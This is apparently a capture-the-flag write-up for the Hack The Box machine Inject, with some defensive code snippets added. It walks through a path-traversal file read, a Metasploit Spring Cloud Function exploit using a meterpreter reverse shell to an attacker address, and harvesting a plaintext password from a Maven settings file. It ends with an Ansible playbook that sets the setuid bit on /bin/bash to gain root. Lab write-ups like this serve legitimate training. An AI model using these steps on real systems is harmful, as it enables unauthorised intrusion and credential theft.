HTB Inject Walkthrough with ChatGPT

Introduction

It’s been a long time since I last played on the HTB machine playground. As a formal exercise for the comeback it is a little difficult, but fortunately, after going through a lot of detours, I really worked it out!

Some hacking techniques you may need:

Ok, let’s go!

Information & Enumeration

Generally, use nmap to enumerate ports; the results are as follows:

# Nmap 7.70 scan initiated Fri Jun  9 14:45:31 2023 as: nmap -p- --min-rate 10000 -oA result 10.10.11.204
Warning: 10.10.11.204 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.204
Host is up (0.22s latency).
Not shown: 63577 closed ports, 1956 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

# Nmap done at Fri Jun  9 14:46:26 2023 -- 1 IP address (1 host up) scanned in 54.73 seconds

Obviously, port 8080 is our target, so try to enumerate further. After using some directory scanning tools, we found a route that lets us upload pictures.

After uploading a picture, you can visit /show_image?img=xxxx.png to view it.

There are some thoughts:

  1. arbitrary file upload: unfortunately, nope 😇
  2. arbitrary file read: yes, it works!

(Another thing I want to mention is that this web application is developed in Java, so the directory tree is deeply nested. If you just input something like /show_image?img=../../../etc/passwd, you will be frustrated 🥲)
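
As an added example (not code from the box or from the author of this walkthrough), here is a hardened version of the show_image lookup in Python, with the naive join beside it for contrast. The upload root is a hypothetical path; the point is that the check compares the resolved path against the upload directory, so it refuses traversal no matter how many ../ are needed to climb out of a deeply nested tree.

```python
from pathlib import Path
from typing import Optional

# Hypothetical upload directory; the real location on the box is not known here.
IMAGE_ROOT = Path("/srv/webapp/uploads")
ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif"}


def naive_lookup(img_param: str, root: Path = IMAGE_ROOT) -> Path:
    """What a vulnerable handler effectively does: joins the user-supplied
    name onto the upload directory and trusts the result."""
    return root / img_param


def escapes_root(img_param: str, root: Path = IMAGE_ROOT) -> bool:
    """True when the naive join would read outside the upload directory."""
    target = naive_lookup(img_param, root).resolve()
    return root.resolve() not in target.parents


def resolve_image(img_param: str, root: Path = IMAGE_ROOT) -> Optional[Path]:
    """Hardened lookup for show_image?img=...  Returns the path to serve,
    or None when the request must be refused with a 4xx."""
    # A picture is referenced by a bare file name; anything carrying a path
    # separator, a NUL byte or a dot-name never reaches the filesystem.
    if not img_param or "/" in img_param or "\\" in img_param:
        return None
    if img_param in {".", ".."} or "\0" in img_param:
        return None
    root_resolved = root.resolve()
    # resolve() collapses ../ lexically and follows symlinks, so the
    # containment check below holds however deep root sits in the tree.
    candidate = (root / img_param).resolve()
    if root_resolved not in candidate.parents:
        return None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    return candidate
```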

shell as user

After reviewing the pom.xml that we just leaked, and searching for spring in msfconsole

There were already some hints on reddit:

https://www.reddit.com/r/hackthebox/comments/128uxbw/htb_inject_machine_help/

Soon you will find that this website is based on Spring Cloud Function.

This exploit, multi/http/spring_cloud_function_spel_injection, may work.

Just use it and set the parameters to match your environment:

msf6 exploit(multi/http/spring_cloud_function_spel_injection) > options 

Module options (exploit/multi/http/spring_cloud_function_spel_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.11.204     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /functionRouter  yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                       0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.65      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

Finally, the exploit succeeds and we get a meterpreter session 😏

shell as user

As we all know, a settings.xml may exist in the ~/.m2 directory, and it can contain important information (Maven server credentials).

Luckily, we found it:

ls -al /home/frank/.m2
total 12
drwx------ 2 frank frank 4096 Feb  1 18:38 .
drwxr-xr-x 8 frank frank 4096 Jun 10 13:09 ..
-rw-r----- 1 root  frank  617 Jan 31 16:55 settings.xml

And surprise!

cat /home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

So we get Phil’s password.

shell as root

After a long search, try linux-enum.sh, which can be downloaded from https://github.com/rebootuser/LinEnum

I found this:

root       88559  0.0  0.0   2608   600 ?        Ss   Jun09   0:00 /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
root       88561  0.0  0.4 172088 16960 ?        Sl   Jun09   0:00 /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/evil.yml /opt/automation/tasks/playbook_1.yml
root       88564  5.3  1.3 137764 54156 ?        Sl   Jun09  48:18 /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/evil.yml
root       88712  0.0  1.2 140892 49780 ?        S    Jun09   0:00 /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/evil.yml

I just submitted it to ChatGPT, and it really works!!! The answer is as follows:

The output you've shared is from the ps command, which provides information about the currently running processes. This output tells us that there is an Ansible automation process running as root user. Ansible is a popular automation tool used to automate a wide range of IT tasks such as configuration management, application deployment, and intra-service orchestration.

This process is executing ansible playbooks found under /opt/automation/tasks/.

Among the tasks, there is an intriguing one named evil.yml. This is a potential red flag, since the name suggests that it might be related to a malicious task or activity. However, the name alone doesn't confirm that; it's just an indication, and further investigation is required.

A common way to exploit this would be if the evil.yml playbook contains tasks that are insecure or if an attacker can write to the /opt/automation/tasks/ directory. In that case, they can modify or create a new playbook with tasks that could help to escalate privileges, then wait for the automation process to execute that playbook.

To further investigate, you could:

  1. Check the contents of the evil.yml playbook.
  2. Check the permissions of the /opt/automation/tasks/ directory.
  3. Look for any tasks in the playbook that may be exploited to escalate privileges or perform unauthorized actions.
  4. Check who has write permissions to the ansible playbook files.

So we can exploit it as follows:

- hosts: localhost
  tasks:
  - name: Exploit task
    command: chmod u+s /bin/bash
    become: true

It turns out that we successfully changed the bash binary:

bash-5.0$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
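
A defender's check for the misconfiguration above, as an added example (not code from the box, from LinEnum or from ChatGPT): it audits a tasks directory the way the root-run ansible-parallel job sees it, flagging the directory itself and every .yml in it that someone other than the trusted owner could write. The demo builds a constructed temporary copy of the layout instead of touching /opt/automation/tasks.

```python
import os
import stat
import tempfile
from typing import List, Tuple

Finding = Tuple[str, str]  # (name relative to the task directory, reason)


def audit_task_dir(task_dir: str, trusted_uid: int = 0) -> List[Finding]:
    """Flag anything in a root-run Ansible task directory that a user other
    than trusted_uid could alter. The directory ('.') is checked because a
    writable directory lets anyone drop a new *.yml for the glob to pick up;
    then every *.yml the job would execute is checked."""
    findings: List[Finding] = []
    names = ["."] + sorted(n for n in os.listdir(task_dir) if n.endswith(".yml"))
    for name in names:
        st = os.lstat(os.path.join(task_dir, name))
        mode = stat.S_IMODE(st.st_mode)
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "symlink; target may live somewhere writable"))
            continue
        if st.st_uid != trusted_uid:
            findings.append((name, f"owned by uid {st.st_uid}, not {trusted_uid}"))
        if mode & stat.S_IWGRP:  # conservative: group write counts as a finding
            findings.append((name, "group-writable"))
        if mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
    return findings


def demo() -> List[Finding]:
    """Constructed layout mirroring the box: a world-writable tasks directory
    holding one safe playbook and one that anyone can edit."""
    d = tempfile.mkdtemp(prefix="tasks-")
    for name, mode in (("playbook_1.yml", 0o644), ("evil.yml", 0o666)):
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write("- hosts: localhost\n  tasks: []\n")
        os.chmod(path, mode)
    os.chmod(d, 0o777)
    # Pass our own uid as trusted so that only the mode bits decide the result.
    return audit_task_dir(d, trusted_uid=os.getuid())


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

On a real host call audit_task_dir("/opt/automation/tasks") with the default trusted uid 0; an empty list is the expected result once the directory and playbooks are root-owned and not writable by anyone else.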

Exactly. Then run bash -p, and we can log in as root!

cat /root/root.txt

*************************